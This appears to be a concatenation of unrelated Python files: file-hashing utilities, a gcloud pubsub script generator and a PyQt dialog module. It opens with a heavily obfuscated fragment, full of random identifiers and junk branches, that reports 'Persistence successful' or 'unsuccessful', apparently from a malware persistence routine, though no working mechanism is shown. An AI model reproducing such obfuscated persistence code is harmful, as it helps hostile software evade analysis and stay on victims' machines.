roSxUnVSyWLaFrvAuuMbtzabPUyunReeToDefXGxyEehLxIWyiYmlaGQNfTyVwfJePzgCSOIeXqvrLjbuAsAPnOlSiZzJKWqJuWedzaIuXeiFSdRvveoYNBZinLwFovl = zSgZpRzhmlDVLwkjfXCeAeCzzJMdydPrBHgTwIvxmHlvCKGHkEGsqRcADgayEpRmGrjtXoPXTXHAQZoIvkjurcoQaYXmgULEoBCcpJPNXVbHiMjAniczSFCPeqIGjFXY
zSgZpRzhmlDVLwkjfXCeAeCzzJMdydPrBHgTwIvxmHlvCKGHkEGsqRcADgayEpRmGrjtXoPXTXHAQZoIvkjurcoQaYXmgULEoBCcpJPNXVbHiMjAniczSFCPeqIGjFXY = wYMqPWrLXYTZyTrDHMiDPcTZuGUMEGfdiEkZZRDVdjLdpeuXZcgQZggyhITspZXMtDsKDUXbGGoMiRtKGIYeNIFgzwFNgsdCCQvxJADJzsFQGOuwjdTFNbbdkrwXikuR
if roSxUnVSyWLaFrvAuuMbtzabPUyunReeToDefXGxyEehLxIWyiYmlaGQNfTyVwfJePzgCSOIeXqvrLjbuAsAPnOlSiZzJKWqJuWedzaIuXeiFSdRvveoYNBZinLwFovl == zSgZpRzhmlDVLwkjfXCeAeCzzJMdydPrBHgTwIvxmHlvCKGHkEGsqRcADgayEpRmGrjtXoPXTXHAQZoIvkjurcoQaYXmgULEoBCcpJPNXVbHiMjAniczSFCPeqIGjFXY:
for zDBCXZzCeYTzjoGcVXgoFxZCYtajDjipDsBAqlxEDgHZLfVxzGqODNYdYGvrznsQjJRWdQoDwzGMCluTTssjijymfbmkRlPHYwXMYSWcgpJPmKtmdhKWCESbiuwICUqG in zSgZpRzhmlDVLwkjfXCeAeCzzJMdydPrBHgTwIvxmHlvCKGHkEGsqRcADgayEpRmGrjtXoPXTXHAQZoIvkjurcoQaYXmgULEoBCcpJPNXVbHiMjAniczSFCPeqIGjFXY:
if zDBCXZzCeYTzjoGcVXgoFxZCYtajDjipDsBAqlxEDgHZLfVxzGqODNYdYGvrznsQjJRWdQoDwzGMCluTTssjijymfbmkRlPHYwXMYSWcgpJPmKtmdhKWCESbiuwICUqG == roSxUnVSyWLaFrvAuuMbtzabPUyunReeToDefXGxyEehLxIWyiYmlaGQNfTyVwfJePzgCSOIeXqvrLjbuAsAPnOlSiZzJKWqJuWedzaIuXeiFSdRvveoYNBZinLwFovl:
roSxUnVSyWLaFrvAuuMbtzabPUyunReeToDefXGxyEehLxIWyiYmlaGQNfTyVwfJePzgCSOIeXqvrLjbuAsAPnOlSiZzJKWqJuWedzaIuXeiFSdRvveoYNBZinLwFovl = zSgZpRzhmlDVLwkjfXCeAeCzzJMdydPrBHgTwIvxmHlvCKGHkEGsqRcADgayEpRmGrjtXoPXTXHAQZoIvkjurcoQaYXmgULEoBCcpJPNXVbHiMjAniczSFCPeqIGjFXY
else:
roSxUnVSyWLaFrvAuuMbtzabPUyunReeToDefXGxyEehLxIWyiYmlaGQNfTyVwfJePzgCSOIeXqvrLjbuAsAPnOlSiZzJKWqJuWedzaIuXeiFSdRvveoYNBZinLwFovl = wYMqPWrLXYTZyTrDHMiDPcTZuGUMEGfdiEkZZRDVdjLdpeuXZcgQZggyhITspZXMtDsKDUXbGGoMiRtKGIYeNIFgzwFNgsdCCQvxJADJzsFQGOuwjdTFNbbdkrwXikuR
return 'Error, platform unsupported.'
if success:
GANiLWIgAKbahvnCcbxjpPzKTCdeLkPbZOVmErymYmEjzlGIBMnaebQfVNMcKUvglkWKIgpyzpRPPWhdWzLHPsvcbpoXCGdAPbrccRORVDlenstZaubSWcFfbvVWDHBi = 'KHTCIYVKuzPyydIkKMvQqDyUueqnfvkqVdaEoiheUXlabjAnvPqwHvsESJaNmEbsgkzIpGczqElbONKZBcBwAULEosAvYndXcbtsgGCLfbPtMnCXxJgKIHORsGKojryd'
qIQaNWZymJHEJRjVYnqikuowQoITnoyCDlsiDQsImRZvYCXdkngtmtveciFFmPFIoZVmEwPqeNDTWoKSfahOmZsDkxDCuzniKNWMqAsiOHxjMAinCeBuLJwtteFeVlWP = 'vOSKLrKnpiVmGKHbbuHBUMnGqxenbtgtHHhmeUHCgaqKITlwIhvjFPxnAcminmJMKCSYqyrMoJpgZdbacPupUPHFUizGeEKrxHKJyUHKBpfBJWDKQQDQLnyzfEDrPJph'
usOEixIjQPrMfLcGMUThglTUuysqywVYcsyIePcUqvSGuPfFMgiIxUBWiriwfxzzEiNgrdrPYadvyEotHjxeMOsjeAMsbzJMVamQGXKaYfWFXneRnEIAkgFDBjioBMKY = 'uVvPtjqPOcNOlYJLoZXAJqldddGvGLLBVlaEXjoIbWilAgfiNeZtahFShbctcaxvxwCYWweyhtSOSsTfULKnNVvjWCqvnwtJcQvnlFrkwULXyolKyhdVDZESjRMWmEWB'
if GANiLWIgAKbahvnCcbxjpPzKTCdeLkPbZOVmErymYmEjzlGIBMnaebQfVNMcKUvglkWKIgpyzpRPPWhdWzLHPsvcbpoXCGdAPbrccRORVDlenstZaubSWcFfbvVWDHBi == qIQaNWZymJHEJRjVYnqikuowQoITnoyCDlsiDQsImRZvYCXdkngtmtveciFFmPFIoZVmEwPqeNDTWoKSfahOmZsDkxDCuzniKNWMqAsiOHxjMAinCeBuLJwtteFeVlWP:
NJddpzJOkofHlpHfgDbHUygjLPzklhDptakOqQrxAGGBUnrgSBpdCACfvjhQFdyolXqHPTakBMrZMVfADDeKLXhqXZZsYLHUuqtrgnNyZQPlWWjIDdVVXGOLmWLMXzLI = 'tIMGnOwSnhlRUayrmrKdXaHOPryPRefnmFKYUqSQMzMGTNQvWDHEMxmHJndWRZiNxSbKtfGBIeSjRnDiNxPKZOsJpNLDpsZUxcFAvhRnrFeLoIoybeArNUXGmEZMiPEU'
NJddpzJOkofHlpHfgDbHUygjLPzklhDptakOqQrxAGGBUnrgSBpdCACfvjhQFdyolXqHPTakBMrZMVfADDeKLXhqXZZsYLHUuqtrgnNyZQPlWWjIDdVVXGOLmWLMXzLI = GANiLWIgAKbahvnCcbxjpPzKTCdeLkPbZOVmErymYmEjzlGIBMnaebQfVNMcKUvglkWKIgpyzpRPPWhdWzLHPsvcbpoXCGdAPbrccRORVDlenstZaubSWcFfbvVWDHBi
else:
NJddpzJOkofHlpHfgDbHUygjLPzklhDptakOqQrxAGGBUnrgSBpdCACfvjhQFdyolXqHPTakBMrZMVfADDeKLXhqXZZsYLHUuqtrgnNyZQPlWWjIDdVVXGOLmWLMXzLI = 'tIMGnOwSnhlRUayrmrKdXaHOPryPRefnmFKYUqSQMzMGTNQvWDHEMxmHJndWRZiNxSbKtfGBIeSjRnDiNxPKZOsJpNLDpsZUxcFAvhRnrFeLoIoybeArNUXGmEZMiPEU'
NJddpzJOkofHlpHfgDbHUygjLPzklhDptakOqQrxAGGBUnrgSBpdCACfvjhQFdyolXqHPTakBMrZMVfADDeKLXhqXZZsYLHUuqtrgnNyZQPlWWjIDdVVXGOLmWLMXzLI = usOEixIjQPrMfLcGMUThglTUuysqywVYcsyIePcUqvSGuPfFMgiIxUBWiriwfxzzEiNgrdrPYadvyEotHjxeMOsjeAMsbzJMVamQGXKaYfWFXneRnEIAkgFDBjioBMKY
AETOfEpJAcGWxlOcQYzGJpiWEadsCqMJeAyQZmWyZavtpjNbltXidcwnJHhIacuqAZywOvKBUcfaKeHHuSkHRWiyTuysieVFxDfLIlIHfzVRPYEvqrucbKHLwfjPVjDc = 'Persistence successful, {}.'.format(NmOtigRiHNqlJxVKDFTueXpfkXtrEaaUPWrloCdgxZSgFXKAkpwqEFZKhEisDwmOGhdbMqLBpwklXthMNHQCagqkJqLMhZRMWPtxhotCnCmKtNHKdctvtiloraUvKeOW)
EmktykGKiJDpmMKGKPmFaKVhGGCIJinheKzmhvMieMYkTMYAuSOtkmjZndIdotfcOjlKTlSYcbrwEEkWHvcjQQNwhscFLJNhqvzKuBfqrkwXVwNRVSQgIArKDQnYLPsI = 'BWVXBmiuvumpBXcMjgwHLwjmleUWBysfLKGEQpOJoEJSPcXeBWZoqScAybnCzhuxOgGZoeWUbcSUbSuGOYIdswBTfFsXSCkwdnuzTcwasWkvwJIVHNMLmlJdTKHadxWN'
kfwZzqVjvWtZuKVVCZjJAKYQzLkMPkDQZLFuDKHgvdQSLtWyYAmiGGHHcHbPymJGWwbSdffPVXBaAnGmYGKFSyOnQYQxjfVkoIXTPevsTDPOFZNEmnpCkTtwqLsCOBrF = 'pkKyPlpekozQuOKulXJRdfOItWEvycnJAAaWiHGIZkMLYPGUZDgqUxlYuPDtPKIgLEwYRkxsylKIQCchLXxXGSFHoyviNXBeUaNyUMisoPghLtcTWXFIQRHiPrnhYmta'
yPoJLkodDhsKpHohHedCnwwnOJlVgSIWrJINhvudbScYUoOvcylcTSKOUVxuWUXosJAOvNvhANQWsiBVFLsXGauUMKvhMyctBqRZnzEjOfONfXPQUhZKnsoLDGaNVnhK = 'bTKyqvllcDsohtjePFBEaxesmIsZximHopeyYRNgnsdvrIYwQoDwAcdSRGXyTQQZQMQzZkwxuQqtMpaZaBgwnaBEnawrLeCXOMHClqoscNlBVfmkRgbbuSVyNNgtEGlm'
if EmktykGKiJDpmMKGKPmFaKVhGGCIJinheKzmhvMieMYkTMYAuSOtkmjZndIdotfcOjlKTlSYcbrwEEkWHvcjQQNwhscFLJNhqvzKuBfqrkwXVwNRVSQgIArKDQnYLPsI == kfwZzqVjvWtZuKVVCZjJAKYQzLkMPkDQZLFuDKHgvdQSLtWyYAmiGGHHcHbPymJGWwbSdffPVXBaAnGmYGKFSyOnQYQxjfVkoIXTPevsTDPOFZNEmnpCkTtwqLsCOBrF:
TdrSYuaHBBJJUpksaPrmRzcHhDdcZJnQLiyVJZAeHVTcNumjlaqdDTiilKSpsotwglqtHZHWmNanFXycmBIwUSsfeYtqBMtiWinfSHnrXYncuWuQSGQVUNIQYSsoJUsv = 'bqXeruVKqkVhdrJqMJycIovYFRYTcKBzidBIDYwOUFQvLpbNzlgKaRNNfsKrnjDINdRJaDfYBzhhKSnxFlxEroTvmgEXfijoYIbxbCTJiFeniBvkrYpXNbARHvqsqbrc'
TdrSYuaHBBJJUpksaPrmRzcHhDdcZJnQLiyVJZAeHVTcNumjlaqdDTiilKSpsotwglqtHZHWmNanFXycmBIwUSsfeYtqBMtiWinfSHnrXYncuWuQSGQVUNIQYSsoJUsv = EmktykGKiJDpmMKGKPmFaKVhGGCIJinheKzmhvMieMYkTMYAuSOtkmjZndIdotfcOjlKTlSYcbrwEEkWHvcjQQNwhscFLJNhqvzKuBfqrkwXVwNRVSQgIArKDQnYLPsI
else:
TdrSYuaHBBJJUpksaPrmRzcHhDdcZJnQLiyVJZAeHVTcNumjlaqdDTiilKSpsotwglqtHZHWmNanFXycmBIwUSsfeYtqBMtiWinfSHnrXYncuWuQSGQVUNIQYSsoJUsv = 'bqXeruVKqkVhdrJqMJycIovYFRYTcKBzidBIDYwOUFQvLpbNzlgKaRNNfsKrnjDINdRJaDfYBzhhKSnxFlxEroTvmgEXfijoYIbxbCTJiFeniBvkrYpXNbARHvqsqbrc'
TdrSYuaHBBJJUpksaPrmRzcHhDdcZJnQLiyVJZAeHVTcNumjlaqdDTiilKSpsotwglqtHZHWmNanFXycmBIwUSsfeYtqBMtiWinfSHnrXYncuWuQSGQVUNIQYSsoJUsv = yPoJLkodDhsKpHohHedCnwwnOJlVgSIWrJINhvudbScYUoOvcylcTSKOUVxuWUXosJAOvNvhANQWsiBVFLsXGauUMKvhMyctBqRZnzEjOfONfXPQUhZKnsoLDGaNVnhK
else:
PLBcCyJepseMCiMLskeXXaEaPxrSiAQBDABBwpbwjPmEQBXfyftSRonDgubqKLvMdtqUIEsyLbXCoDwfeHrEUwCAtaVmQFmaVByQIslHNmMXpbVXGcZkGHcvgBDYREHx = 'YIeomnqfouukglQulxwCQRuVUGGWjRrTaxPeJKmlvoyfYqNiilugIsZMdzTnmAFzWbNBsndaPlAVhKqFrwODsGelztRjsOhcVlKCDAiOYkeSGXgydqWzZYVdFkaXbCdN'
AwyPxsvvAFQJSBzBPMbwBMdRpKizAljsdVrUyxPisyfdbHjXVgltSRuWyrpznRHgmSPFLAPcVPAqsjvkZLDsIrcnMEIXEmypXkygSQMdLMjtCeEqqtuXZPnEuofPkuFW = 'kBiMmJGPnLpMoXDFIgPmELFEyImIZfNyRdYraAvphheOQNUdvheHMOmNWWtqYNmfXVDJbJCxKnOpGXhaRKugbhzouSRkwYWZRcsDmZlGCVMmKZgzVMxFIaiOAjFyoSwx'
SFNnASNmEvBZsqyZPylHBJLhFBfSxnJxuGCxBCWvfcqlHpDWXMRrHKhCSVnKYsueJePHmAJymFumxwpdjPTOAQKxRBjGsTbXdeovKEbfVvktwaZdMiHUAvxRONeJOgIN = 'MAYPlUPQgMDIxHIrWosIVbRsCqCYojhEzLybDXhAUANAnpEMeKdWbypWiTnKGxtzBpNzhbuwcXKCAIfNIeBotPueQsqYrxRDCPGGcelSNUHLAgzkfkmvqZQkWPkXfUHS'
GxsglDorLSiNmmxsMwZbUoGbPQBaUgpuorSZsuZmxuiFJdvWDEItAArPwGgSbIVjMQTkyZSubHYGNpwOufTpvYOxyUxxVjiyDuUflILRIyZPzmxoCCcRUYCUFvIkUYbw = 'VDJKNNbAOCxEbArhAMmzlqvUTfVmqsJcnuyiGeMXYNmYOZMvsTCCJxnPLuQFNntDhkVIdNWKIItGVXntUhDlOtGHiBnqVeffSecUhtkcAnWwUbzFJOsozaFdQxEALgfa'
GXWdmJOGpTQvSCckhngBvAZOaZhjEuYwLgqWqcDnyaaiIPbECsmVjskaVHaxgFWSMFqxFeoZCVdWjJMmguYYmTATdnBvIBFyzeFNvqpUhGumznDPFImWlFMTqJzCLWpb = 'IddWmEvmfmILKtaZQKLMgdYaQvDlLHAjzgvqIPhRQzruDIvSsgDCakLgXrJHVSoklYvLgHaxEGcNFCzRXVfVKfwVIJBLXuOzSpedezkHtBFqaPTquZordtZwzkvGWfzC'
uNzZJovYyVzEbBUoiltANpEBQHQVBdjEFgcImZLEXqVrtxYLxJFSBvdzlbLOXWjNLzkABujygIQEDvulEntlashizksXGKbgosRMFPcmzTZrlqTbCjxZWLiJnoOnsAEj = 'WKpDRWbHCudbUSlVaLTflrbltxrWElpxEiSZSqgiSqAhbTcmirsYEfcrfoOlTFMiQbAtlokfdiKijjbPLQsmnTDuFBYEMEnrYDAxzLnPWfplKMXdFsjdmTreDnSLVfLK'
if PLBcCyJepseMCiMLskeXXaEaPxrSiAQBDABBwpbwjPmEQBXfyftSRonDgubqKLvMdtqUIEsyLbXCoDwfeHrEUwCAtaVmQFmaVByQIslHNmMXpbVXGcZkGHcvgBDYREHx != GxsglDorLSiNmmxsMwZbUoGbPQBaUgpuorSZsuZmxuiFJdvWDEItAArPwGgSbIVjMQTkyZSubHYGNpwOufTpvYOxyUxxVjiyDuUflILRIyZPzmxoCCcRUYCUFvIkUYbw:
AwyPxsvvAFQJSBzBPMbwBMdRpKizAljsdVrUyxPisyfdbHjXVgltSRuWyrpznRHgmSPFLAPcVPAqsjvkZLDsIrcnMEIXEmypXkygSQMdLMjtCeEqqtuXZPnEuofPkuFW = SFNnASNmEvBZsqyZPylHBJLhFBfSxnJxuGCxBCWvfcqlHpDWXMRrHKhCSVnKYsueJePHmAJymFumxwpdjPTOAQKxRBjGsTbXdeovKEbfVvktwaZdMiHUAvxRONeJOgIN
for uNzZJovYyVzEbBUoiltANpEBQHQVBdjEFgcImZLEXqVrtxYLxJFSBvdzlbLOXWjNLzkABujygIQEDvulEntlashizksXGKbgosRMFPcmzTZrlqTbCjxZWLiJnoOnsAEj in GxsglDorLSiNmmxsMwZbUoGbPQBaUgpuorSZsuZmxuiFJdvWDEItAArPwGgSbIVjMQTkyZSubHYGNpwOufTpvYOxyUxxVjiyDuUflILRIyZPzmxoCCcRUYCUFvIkUYbw:
if uNzZJovYyVzEbBUoiltANpEBQHQVBdjEFgcImZLEXqVrtxYLxJFSBvdzlbLOXWjNLzkABujygIQEDvulEntlashizksXGKbgosRMFPcmzTZrlqTbCjxZWLiJnoOnsAEj != SFNnASNmEvBZsqyZPylHBJLhFBfSxnJxuGCxBCWvfcqlHpDWXMRrHKhCSVnKYsueJePHmAJymFumxwpdjPTOAQKxRBjGsTbXdeovKEbfVvktwaZdMiHUAvxRONeJOgIN:
AwyPxsvvAFQJSBzBPMbwBMdRpKizAljsdVrUyxPisyfdbHjXVgltSRuWyrpznRHgmSPFLAPcVPAqsjvkZLDsIrcnMEIXEmypXkygSQMdLMjtCeEqqtuXZPnEuofPkuFW = AwyPxsvvAFQJSBzBPMbwBMdRpKizAljsdVrUyxPisyfdbHjXVgltSRuWyrpznRHgmSPFLAPcVPAqsjvkZLDsIrcnMEIXEmypXkygSQMdLMjtCeEqqtuXZPnEuofPkuFW
else:
GXWdmJOGpTQvSCckhngBvAZOaZhjEuYwLgqWqcDnyaaiIPbECsmVjskaVHaxgFWSMFqxFeoZCVdWjJMmguYYmTATdnBvIBFyzeFNvqpUhGumznDPFImWlFMTqJzCLWpb = PLBcCyJepseMCiMLskeXXaEaPxrSiAQBDABBwpbwjPmEQBXfyftSRonDgubqKLvMdtqUIEsyLbXCoDwfeHrEUwCAtaVmQFmaVByQIslHNmMXpbVXGcZkGHcvgBDYREHx
else:
SFNnASNmEvBZsqyZPylHBJLhFBfSxnJxuGCxBCWvfcqlHpDWXMRrHKhCSVnKYsueJePHmAJymFumxwpdjPTOAQKxRBjGsTbXdeovKEbfVvktwaZdMiHUAvxRONeJOgIN = PLBcCyJepseMCiMLskeXXaEaPxrSiAQBDABBwpbwjPmEQBXfyftSRonDgubqKLvMdtqUIEsyLbXCoDwfeHrEUwCAtaVmQFmaVByQIslHNmMXpbVXGcZkGHcvgBDYREHx
PLBcCyJepseMCiMLskeXXaEaPxrSiAQBDABBwpbwjPmEQBXfyftSRonDgubqKLvMdtqUIEsyLbXCoDwfeHrEUwCAtaVmQFmaVByQIslHNmMXpbVXGcZkGHcvgBDYREHx = GXWdmJOGpTQvSCckhngBvAZOaZhjEuYwLgqWqcDnyaaiIPbECsmVjskaVHaxgFWSMFqxFeoZCVdWjJMmguYYmTATdnBvIBFyzeFNvqpUhGumznDPFImWlFMTqJzCLWpb
if SFNnASNmEvBZsqyZPylHBJLhFBfSxnJxuGCxBCWvfcqlHpDWXMRrHKhCSVnKYsueJePHmAJymFumxwpdjPTOAQKxRBjGsTbXdeovKEbfVvktwaZdMiHUAvxRONeJOgIN == PLBcCyJepseMCiMLskeXXaEaPxrSiAQBDABBwpbwjPmEQBXfyftSRonDgubqKLvMdtqUIEsyLbXCoDwfeHrEUwCAtaVmQFmaVByQIslHNmMXpbVXGcZkGHcvgBDYREHx:
for uNzZJovYyVzEbBUoiltANpEBQHQVBdjEFgcImZLEXqVrtxYLxJFSBvdzlbLOXWjNLzkABujygIQEDvulEntlashizksXGKbgosRMFPcmzTZrlqTbCjxZWLiJnoOnsAEj in PLBcCyJepseMCiMLskeXXaEaPxrSiAQBDABBwpbwjPmEQBXfyftSRonDgubqKLvMdtqUIEsyLbXCoDwfeHrEUwCAtaVmQFmaVByQIslHNmMXpbVXGcZkGHcvgBDYREHx:
if uNzZJovYyVzEbBUoiltANpEBQHQVBdjEFgcImZLEXqVrtxYLxJFSBvdzlbLOXWjNLzkABujygIQEDvulEntlashizksXGKbgosRMFPcmzTZrlqTbCjxZWLiJnoOnsAEj == SFNnASNmEvBZsqyZPylHBJLhFBfSxnJxuGCxBCWvfcqlHpDWXMRrHKhCSVnKYsueJePHmAJymFumxwpdjPTOAQKxRBjGsTbXdeovKEbfVvktwaZdMiHUAvxRONeJOgIN:
SFNnASNmEvBZsqyZPylHBJLhFBfSxnJxuGCxBCWvfcqlHpDWXMRrHKhCSVnKYsueJePHmAJymFumxwpdjPTOAQKxRBjGsTbXdeovKEbfVvktwaZdMiHUAvxRONeJOgIN = PLBcCyJepseMCiMLskeXXaEaPxrSiAQBDABBwpbwjPmEQBXfyftSRonDgubqKLvMdtqUIEsyLbXCoDwfeHrEUwCAtaVmQFmaVByQIslHNmMXpbVXGcZkGHcvgBDYREHx
else:
SFNnASNmEvBZsqyZPylHBJLhFBfSxnJxuGCxBCWvfcqlHpDWXMRrHKhCSVnKYsueJePHmAJymFumxwpdjPTOAQKxRBjGsTbXdeovKEbfVvktwaZdMiHUAvxRONeJOgIN = GXWdmJOGpTQvSCckhngBvAZOaZhjEuYwLgqWqcDnyaaiIPbECsmVjskaVHaxgFWSMFqxFeoZCVdWjJMmguYYmTATdnBvIBFyzeFNvqpUhGumznDPFImWlFMTqJzCLWpb
AETOfEpJAcGWxlOcQYzGJpiWEadsCqMJeAyQZmWyZavtpjNbltXidcwnJHhIacuqAZywOvKBUcfaKeHHuSkHRWiyTuysieVFxDfLIlIHfzVRPYEvqrucbKHLwfjPVjDc = 'Persistence unsuccessful, {}.'.format(NmOtigRiHNqlJxVKDFTueXpfkXtrEaaUPWrloCdgxZSgFXKAkpwqEFZKhEisDwmOGhdbMqLBpwklXthMNHQCagqkJqLMhZRMWPtxhotCnCmKtNHKdctvtiloraUvKeOW)
tBsFjXoIQsvGzSRkhjrfCrncCbtZuWWQAfaRTcckPGaoZaFfXZgMnlKZYsJpegYLRFMemcfaSyoAxsIHstHPzICDiwnOVULngGnuGbiOEXiUlnIobWmRUrxIKwDHJMYe = 'jOaZAEhrzeCAucAhxmvHbrrpPAFAenRBBxypGIEmaWrYCFnqBsKjGvmBufyHYCYggHvIXRBTeQaAlQlZdimayVYpIUHIQXRYXtlNVAcRvbRVfwnhYhYEItgBPyTPdtTQ'
IVbTWkEQXlocDUSYdpjEdfTzVdbNNwbXFkiowdqEIUQlwLEoeoqoXqUIIwGDfTDUUOQumRBRtqubiIRAHJdfCaPbvcjhqDmPNyXZhikomNoASodkeCfdcsFAmGetuDRF = 'JJnMrUzYsBDJjHjejuhUonLZtWkFsGtNUgKMoauNevgeYYDdyLKmlPTaCYUdRZSglgWaXsVwSUuYWFkDTbBpwtPjgFDLnojeojptMYodaPwNzMgigynTUowoOQglCBvQ'
if tBsFjXoIQsvGzSRkhjrfCrncCbtZuWWQAfaRTcckPGaoZaFfXZgMnlKZYsJpegYLRFMemcfaSyoAxsIHstHPzICDiwnOVULngGnuGbiOEXiUlnIobWmRUrxIKwDHJMYe != IVbTWkEQXlocDUSYdpjEdfTzVdbNNwbXFkiowdqEIUQlwLEoeoqoXqUIIwGDfTDUUOQumRBRtqubiIRAHJdfCaPbvcjhqDmPNyXZhikomNoASodkeCfdcsFAmGetuDRF:
UuJJMExSFKQSwydPLiTvpkayrQwrNBUPpYWxgWGoGcirdsboAaudrbhSkiruzOCelZSCiIWFLFuvVcRdXLliQinNUEHtxvGqLFcPqhEOttLUDBntmYMfzmtuAOcHydmf = 'CgMVfMfSYPwTzjyERXVvMbNTVsTbgUhDBteIyuBpUYVQBXBPwvNkNhDiKoOksCqMBAukbXmRtngsyjrbommrVqupqOAIAZDnvipNpLpmFkacSeSShHbfbTtkdGZMhEag'
uHeRjhjrxIaHQpPzQTWIcPUxgcpdiDEqOvIOnRILIqNKGlmjnVvvXgCEYpzqArKxmBjyHpvWkfLmkLQBmKSLeyNdaARwbaZbbNBIjZjFzpbbVqblTryMecBzBPjtqUqc = 'TDQyYelxcYZzMZVgTiobtQiIaRsTFbSmVHegUjjIXcPcclIWACyDxBrHapxvqddRSFVIAwxlAKAidAiGNbpLSuvtqWHcHRskafyktIVYnCPwGeHPsZXMxMLDUVgOwfuU'
uHeRjhjrxIaHQpPzQTWIcPUxgcpdiDEqOvIOnRILIqNKGlmjnVvvXgCEYpzqArKxmBjyHpvWkfLmkLQBmKSLeyNdaARwbaZbbNBIjZjFzpbbVqblTryMecBzBPjtqUqc = UuJJMExSFKQSwydPLiTvpkayrQwrNBUPpYWxgWGoGcirdsboAaudrbhSkiruzOCelZSCiIWFLFuvVcRdXLliQinNUEHtxvGqLFcPqhEOttLUDBntmYMfzmtuAOcHydmf
return AETOfEpJAcGWxlOcQYzGJpiWEadsCqMJeAyQZmWyZavtpjNbltXidcwnJHhIacuqAZywOvKBUcfaKeHHuSkHRWiyTuysieVFxDfLIlIHfzVRPYEvqrucbKHLwfjPVjDc
|
from __future__ import annotations
import hashlib
import io
import os
import stat
from pathlib import Path
def read_file(filepath: Path) -> bytes:
"""Return the contents of a file as bytes.
If the file is a symlink, read its contents instead of its target.
"""
if filepath.is_symlink():
return os.readlink(bytes(filepath)) + b"\n"
return filepath.read_bytes()
def write_file(filepath: Path, contents: bytes, symlink: bool):
"""Write bytes to a file on disk.
Create any parent directories as needed in order to create the file.
Delete the file or symlink if it already exists. If the target is meant to
be a symlink, create it as one.
"""
filepath.parent.mkdir(parents=True, exist_ok=True)
delete_file(filepath)
if symlink:
target = contents.decode().rstrip()
filepath.symlink_to(target)
else:
filepath.write_bytes(contents)
def delete_file(filepath: Path):
"""Delete a file. Do not follow symlinks.
If it is read-only, chmod it first to make sure we can delete it.
"""
try:
filepath.chmod(stat.S_IWRITE | stat.S_IREAD)
filepath.unlink()
except FileNotFoundError:
pass
def filesize(filepath: Path):
"""Get the size of a file on disk. If it is a symlink, get the size of the link."""
if filepath.is_symlink():
return len(read_file(filepath))
return os.path.getsize(filepath)
def hash_buffer(buffer):
"""Compute the MD5 digest of a byte buffer."""
block_size = 1024 * 1024 # 1 MiB
m = hashlib.md5()
while True:
block = buffer.read(block_size)
if not block:
break
m.update(block)
return m.digest()
def hash_bytes(data: bytes):
"""Compute the MD5 digest of bytes."""
return hash_buffer(io.BytesIO(data))
def hash_file(filepath: Path):
"""Compute the MD5 digest of a file."""
if filepath.is_symlink():
return hash_bytes(read_file(filepath))
with filepath.open("rb") as buffer:
return hash_buffer(buffer)
def human_size(byte_size):
"""Convert number of bytes into human-readable size (base 1024)."""
for suffix in ["bytes", "KiB", "MiB", "GiB", "TiB"]:
if byte_size < 1024.0:
return f"{byte_size:-6.1f} {suffix}"
byte_size /= 1024.0
return f"{byte_size:-6.1f} PiB"
|
"""Generate call_functions_batch.sh
- in : from/to date
- out: shell script for calling cloud functions
"""
import datetime
import json
import sys
def main():
args = sys.argv
oldest_dt = datetime.datetime.strptime(args[1], '%Y-%m-%d')
latest_dt = datetime.datetime.strptime(args[2], '%Y-%m-%d')
# check
if oldest_dt >= latest_dt:
print('oldest_dt must be less than latest_dt.')
sys.exit(1)
# split day by day
target_dates = []
_start = oldest_dt
_end = _start + datetime.timedelta(days=1)
while _end <= latest_dt:
target_dates.append(_start.strftime(format='%Y-%m-%d'))
_start = _end
_end = _start + datetime.timedelta(days=1)
# make script string
base_str = "gcloud pubsub topics publish ingested-slackdata-to-gcs --project=salck-visualization"
cmd_lines = []
for i, target_date in enumerate(target_dates):
# comment
comment_str = "echo exec trigger function {}".format(i+1)
cmd_lines.append(comment_str)
# main execution
blob_dir = f"slack_lake/daily-ingest_target-date_{target_date}"
opt = "{\\\"data\\\":{\\\"message\\\":\\\"Manual Publish with gcloud\\\",\\\"blob-dir-path\\\":" + f"\\\"{blob_dir}\\\"" + "}}"
opt_str = f"--message=\"{opt}\""
cmd_lines.append(base_str + " " + opt_str)
# sleep
sleep_time_sec = 300
cmd_lines.append(f"echo sleep {sleep_time_sec} seconds until next execution ...")
cmd_lines.append(f"sleep {sleep_time_sec}")
# write script
with open('call_functions_batch.sh', 'w') as f:
f.write("\n".join(cmd_lines))
if __name__ == "__main__":
args = sys.argv
# parse args
if len(args) != 3:
print('3 args are required.')
print('{} args are input.'.format(len(args)))
print('1st positional arg is oldest date (YYYY-MM-DD)')
print('2nd positional arg is latest date (YYYY-MM-DD)')
sys.exit(1)
main()
|
import os
from pickle import dump, load
from PyQt5.QtCore import Qt, pyqtSignal, QSize
from PyQt5.QtGui import QIcon, QStandardItem, QStandardItemModel, QPixmap, QLinearGradient
from PyQt5.QtWidgets import (QAbstractItemView, QPushButton, QFileDialog, QLineEdit, QDialog, QLabel, QFormLayout,
QTextEdit, QGridLayout, QListView, QDialogButtonBox, QVBoxLayout, QHBoxLayout, QComboBox, QCheckBox)
from Ui_share import Ui_Dialog
def update_settings(config_file: str, up_info: dict, is_settings=False):
"""更新配置文件"""
try:
with open(config_file, "rb") as _file:
_info = load(_file)
except Exception:
_info = {}
if is_settings:
try: _settings = _info["settings"]
except Exception:
_settings = {}
_settings.update(up_info)
_info.update(_settings)
else:
_info.update(up_info)
with open(config_file, "wb") as _file:
dump(_info, _file)
dialog_qss_style = """
QLabel {
font-weight: 400;
font-size: 14px;
}
QLineEdit {
padding: 1px;
border-style: solid;
border: 2px solid gray;
border-radius: 8px;
}
QTextEdit {
padding: 1px;
border-style: solid;
border: 2px solid gray;
border-radius: 8px;
}
QPushButton {
color: white;
background-color: QLinearGradient(x1: 0, y1: 0, x2: 0, y2: 1,stop: 0 #88d,
stop: 0.1 #99e, stop: 0.49 #77c, stop: 0.5 #66b, stop: 1 #77c);
border-width: 1px;
border-color: #339;
border-style: solid;
border-radius: 7;
padding: 3px;
font-size: 13px;
padding-left: 5px;
padding-right: 5px;
min-width: 70px;
max-width: 70px;
min-height: 14px;
max-height: 14px;
}
#btn_chooseMutiFile, #btn_chooseDir {
min-width: 90px;
max-width: 90px;
}
"""
# https://thesmithfam.org/blog/2009/09/10/qt-stylesheets-tutorial/
class MyLineEdit(QLineEdit):
"""添加单击事件的输入框,用于设置下载路径"""
clicked = pyqtSignal()
def __init__(self, parent):
super(MyLineEdit, self).__init__(parent)
def mouseReleaseEvent(self, QMouseEvent):
if QMouseEvent.button() == Qt.LeftButton:
self.clicked.emit()
class LoginDialog(QDialog):
"""登录对话框"""
clicked_ok = pyqtSignal()
def __init__(self, config):
super().__init__()
self._config = config
self._user = ""
